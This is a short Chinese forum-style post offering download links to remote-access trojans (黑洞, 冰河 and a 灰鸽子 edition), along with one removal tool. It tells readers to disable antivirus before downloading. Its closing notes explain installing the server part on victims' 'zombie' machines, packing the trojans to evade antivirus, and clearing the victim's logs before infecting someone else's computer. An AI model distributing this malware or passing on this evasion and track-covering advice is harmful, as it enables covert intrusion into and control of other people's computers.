恩，现在发布地址黑洞远程控制/d/%e9%bb%91%e6%b4%9e%e8%bf%9c%e7%a8%8b%e7%ae%a1%e7%90%86 %202.1%20%e6%ad%a3%e5%bc%8f%e7%89%88.rar/2467c0c9475140e571787daa31e00c2bc7f075 5484b3b300木马——黑洞/d/BlackHole1.98.rar/d26e11047ab9fbc55098c3d064e9ce6813a5 dbd86fe9c000木马——冰河/d/%e5%9b%bd%e4%ba%a7%e6%9c%a8%e9%a9%ac%e5%86%b0%e6%b2%b3 2.2.rar/1120705465ae9d58adbc74d4ae65b03f418088fe40f20a00木马——红客联盟版灰鸽子/d/%e7%81%b0%e9%b8%bd%e5%ad%90.rar/eee2f6d3caea7c75603bfe 1d58770fc847bef579c6ad3c00要是有人下的话提前关好杀毒软件不然会被杀没有加壳呢杀冰河的软件——冰河陷阱/d/%e5%86%b0%e6%b2%b3%e9%99%b7%e9%98%b1.rar/e2b783cdbbbc5 3520448b9d7b0cacacd49e95e7fd8a40b00备注：1、以上木马都是服务端&客户端型，也就是主要分成两个部分，服务端是用来装在肉鸡上的，客户端是装在自己电脑上的所以不要在自己电脑上安装服务端— server2、在学会加花加壳之前，不要使木马在有杀毒软件的机器上，虽然也不一定能查到3、在学会清理对方日志前，不要将服务端安装在他人电脑上。